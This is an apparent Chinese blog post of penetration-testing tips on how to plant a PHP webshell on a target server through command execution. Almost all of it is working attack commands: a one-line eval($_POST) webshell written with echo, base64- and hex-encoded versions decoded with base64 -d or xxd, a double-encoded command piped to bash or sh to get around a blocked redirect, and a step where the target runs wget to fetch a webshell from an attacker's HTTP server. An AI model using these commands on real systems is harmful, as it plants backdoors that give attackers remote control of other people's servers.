渗透tip-----命令执行写入webshell

1.echo直接写入

echo '<?php eval($_POST[1]); ?>' > 1.php

2.base64写入

echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php

3.绕过重定向符

echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | bash
echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | sh

重定向符>不可用时，我们可以将1或2中的整体命令base64编码

4.远端下载webshell

远端服务器放置webshell,开启httppython -m http.server
目标机器执行wget http://xx.xx.xxx.xx:8000/xxx.php

5.hex写入

hex写入与base64写入相似，在 https://www.107000.com/T-Hex/
将webshell编码成hex，使用xxd命令还原

或在使用前将webshell使用xxd生成hex数据

echo '<?php eval($_POST[1]); ?>' |xxd -ps

然后命令注入执行

echo 3C3F706870206576616C28245F504F53545B315D293B203F3E|xxd -r -ps > 5.php

posted @ 2021-07-23 18:39 Shadown-PQ 阅读(950) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

B&&W

渗透tip-----命令执行写入webshell

1.echo直接写入

2.base64写入

3.绕过重定向符

4.远端下载webshell

5.hex写入

公告